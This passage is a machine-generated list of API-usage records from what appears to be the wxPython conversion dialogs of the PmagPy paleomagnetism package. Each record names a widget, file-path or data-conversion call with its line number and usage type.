1897, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_srm_lore", "line_number": 1901, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1901, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 1908, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1908, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1908, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1909, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1909, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_dscr_lore", "line_number": 1911, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1911, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6_lore", "line_number": 1917, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1917, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_kly4s_lore", "line_number": 1926, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1926, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1933, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1933, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1935, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1935, "usage_type": "name"}, {"api_name": "wx.BLACK", "line_number": 1946, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1949, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1960, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1963, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1968, "usage_type": "attribute"}, {"api_name": "wx.BLACK", 
"line_number": 1971, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 1979, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1979, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1985, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1985, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_srm_lore", "line_number": 1985, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1985, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1987, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1987, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_dscr_lore", "line_number": 1987, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1987, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1989, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1989, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6_lore", "line_number": 1989, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1989, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1991, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1991, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_kly4s_lore", "line_number": 1991, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1991, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2002, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2002, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2003, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2003, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 2006, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2006, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2010, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2010, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2015, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2015, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2020, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2020, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2025, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2025, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2028, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2028, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2031, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2031, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2036, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2036, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2039, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2039, 
"usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2042, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2042, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2045, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2045, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2046, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2046, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2047, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2047, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2048, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2048, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2049, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2049, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2050, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2050, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2051, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2051, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2052, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2052, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2053, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2053, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2054, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2057, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2057, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 2070, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 2076, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2083, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2083, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2094, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2094, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.pmd", "line_number": 2129, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2129, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2131, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2131, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2134, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2134, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2141, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2141, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.pmd", "line_number": 2141, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2141, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2144, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2150, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2150, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 2150, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2151, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 
2159, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2159, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2160, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2160, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.labeled_yes_or_no", "line_number": 2166, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2166, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.check_box", "line_number": 2169, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2169, "usage_type": "name"}, {"api_name": "wx.EVT_CHECKBOX", "line_number": 2170, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2173, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2173, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2177, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2177, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2181, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2181, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2186, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2186, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2190, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2190, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2193, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2193, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2196, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2196, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2200, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2200, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2204, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2204, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2207, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2207, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2210, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2210, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2213, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2213, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2216, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2216, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2217, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2217, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2218, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2218, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2221, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2221, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2222, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 
2222, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2223, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2223, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2224, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2224, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2225, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2225, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2226, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2226, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2227, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2227, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2228, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2228, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2229, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2229, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2230, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2230, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2231, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2231, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2232, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2232, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2233, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2233, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 2235, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 2235, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 2235, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2236, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2239, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2239, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2275, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2275, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2279, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2279, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2292, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2294, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2294, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2297, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2299, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2299, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2301, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2301, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2303, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2303, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2305, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2305, "usage_type": 
"attribute"}, {"api_name": "os.chdir", "line_number": 2334, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2343, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2343, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2349, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2349, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2352, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2352, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.jr6_txt", "line_number": 2361, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2361, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2364, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2364, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2366, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2366, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.jr6_jr6", "line_number": 2368, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2368, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2371, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2371, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2373, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2373, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2376, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2376, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6", "line_number": 2377, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2377, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2380, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2380, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2382, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2382, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2396, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2396, "usage_type": "name"}, {"api_name": "programs.conversion_scripts.jr6_txt_magic.do_help", "line_number": 2396, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.jr6_txt_magic", "line_number": 2396, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2398, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2398, "usage_type": "name"}, {"api_name": "programs.conversion_scripts.jr6_jr6_magic.do_help", "line_number": 2398, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.jr6_jr6_magic", "line_number": 2398, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2401, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2407, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2407, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 2407, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2408, "usage_type": "call"}, {"api_name": "wx.BoxSizer", 
"line_number": 2417, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2417, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2418, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2418, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2421, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2421, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2424, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2424, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2427, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2427, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2430, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2430, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2434, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2434, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2438, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2438, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2442, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2442, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2445, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2445, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2449, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2449, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2453, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2453, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2457, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2457, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2460, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2460, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2461, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2461, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2462, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2462, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2463, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2463, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2464, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2464, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2465, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2465, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2466, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2466, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2467, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2467, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2468, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2468, "usage_type": 
"attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2469, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2469, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2472, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2475, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2475, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2489, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2489, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 2492, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 2497, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2497, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2538, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2538, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 2547, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 2547, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2547, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2562, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2562, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2569, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2569, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2572, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2572, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2574, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2574, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2581, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2581, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2581, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2581, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2599, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2599, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2600, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2600, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2603, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2603, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2606, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2606, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2609, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2609, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2613, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2613, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2617, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2617, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2620, "usage_type": "call"}, {"api_name": 
"dialogs.pmag_widgets", "line_number": 2620, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 2623, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2623, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.check_box", "line_number": 2627, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2627, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2630, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2630, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2634, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2634, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2637, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2637, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2640, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2640, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2641, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2641, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2642, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2642, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2643, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2643, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2644, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2644, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2645, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2645, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2646, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2646, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2647, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2647, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2648, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2648, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2649, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2649, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 2651, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 2651, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 2651, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2652, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2655, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2655, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 2671, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2677, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2677, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2679, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2679, "usage_type": "attribute"}, 